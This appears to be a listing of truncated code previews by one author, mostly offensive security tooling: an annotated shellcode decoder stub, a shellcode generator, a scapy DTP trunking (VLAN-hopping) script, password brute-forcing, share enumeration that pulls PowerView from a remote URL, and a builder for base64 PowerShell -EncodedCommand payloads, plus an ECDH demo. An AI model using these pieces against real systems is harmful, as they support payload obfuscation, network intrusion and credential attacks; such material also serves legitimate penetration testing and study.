FrankSpierings

# 
#                                      _payload:
# 00002014 B8DAFFFECD                      mov        eax, 0xcdfeffda             ; Move the initialisation vector (IV) into EAX. This is the initial key, XREF=_main+13
# 00002019 DAD3                            fcmovbe    st0, st3                    ; (Not sure) Conditional move ST0 to ST3 (floating point). Not sure why this is necessary
# 0000201b D97424F4                        fnstenv    dword [ss:esp-0xc]          ; Places the floating point memory into designated location in memory. This includes EIP. Note the offset to ESP (Stack Pointer). This makes sure that ESP will point to stored EIP.
# 0000201f 5B                              pop        ebx                         ; Get EIP from the stack. This was saved by FSTENV
# 00002020 29C9                            sub        ecx, ecx                    ; Zero out ECX
# 00002022 B10E                            mov        cl, 0xe                     ; ECX is loop counter
#                                 

FrankSpierings

# Nasm code for the stub.
# ________
#
# global start
#  
#  
# section .text
#  
# start:
# 	mov     rax, 0x0123456789ABCDEF  ; set the key.

FrankSpierings

; nasm -f macho64 test.asm -o test.o \
; && ld -o test -segprot __DATA rwx rwx test.o

global start

section .text
 
start:
	mov     rax, 0x0123456789ABCDEF  ; Set the initial key (IV)
	lea     rbx, [rel $]             ; Place current instruction pointer RIP in RBX

FrankSpierings

import random
import struct
import re
import ctypes

class ShellcodeGenerator:
    __QWORD_SIZE = 8

    __iv      = 0x0000000000000000
    __payload = ""

FrankSpierings

from scapy.all import *
from scapy.contrib.dtp import *

FLAG_TRUNK = 0x80
RETRY      = 10
SEND_WAIT  = 5 

iface = 'en0'
dtpmac = "01:00:0c:cc:cc:cc"
mymac = get_if_hwaddr(iface) 

FrankSpierings

$charset  = @()
$charset += ([char]'0'..[char]'9') |% {[char]$_}
$charset += ([char]'a'..[char]'z') |% {[char]$_}
$charset += ([char]'A'..[char]'Z') |% {[char]$_}
$charset  = $charset | Select-Object -uniq

function Get-NextPassword() {
    param(
        $Password
    )    

FrankSpierings

$host_filter  = '^C|^T'
$share_filter = 'IPC$'
$depends_url  = "https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1"
$logfile      = "foundshares.log"
$serialobj    = $("{0}.xml" -f $logfile)

$DebugPreference = "Continue"
#$DebugPreference = "SilentlyContinue"

#Import dependency

FrankSpierings

#! /usr/bin/env python
#
# Modification from:
# https://unix.stackexchange.com/questions/6267/how-to-re-load-all-running-applications-from-swap-space-into-ram/6271
#
# For non-root check 'cat /proc/sys/kernel/yama/ptrace_scope' = 0
# Reference: https://www.kernel.org/doc/Documentation/security/Yama.txt
#
import re
import sys

FrankSpierings

$DebugPreference = "Continue"
function Create-Base64Payload()
{
    param(
        $Filename
    )
    $content = (Get-Content -Path $Filename | Out-String)
    $command = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($content))
    Write-Debug "[+] Mind the newlines!"
    Write-Debug "[+] Powershell.exe -EncodedCommand $command"

FrankSpierings

[System.Security.Cryptography.CngKey]$aliceKey = [System.Security.Cryptography.CngKey]::Create([System.Security.Cryptography.CngAlgorithm]::ECDiffieHellmanP256)
[System.Security.Cryptography.CngKey]$bobKey   = [System.Security.Cryptography.CngKey]::Create([System.Security.Cryptography.CngAlgorithm]::ECDiffieHellmanP256)
[Byte[]]$alicePubKeyBlob = $aliceKey.Export([System.Security.Cryptography.CngKeyBlobFormat]::EccPublicBlob)
[Byte[]]$bobPubKeyBlob   = $bobKey.Export([System.Security.Cryptography.CngKeyBlobFormat]::EccPublicBlob)

[System.Security.Cryptography.ECDiffieHellmanCng]$aliceAlgorithm = New-Object System.Security.Cryptography.ECDiffieHellmanCng($aliceKey)
[System.Security.Cryptography.CngKey]$bobPubKey = [System.Security.Cryptography.CngKey]::Import($bobPubKeyBlob, [System.Security.Cryptography.CngKeyBlobFormat]::EccPublicBlob)
[Byte[]]$aliceSymKey = $aliceAlgorithm.DeriveKeyMaterial($bobPubKey)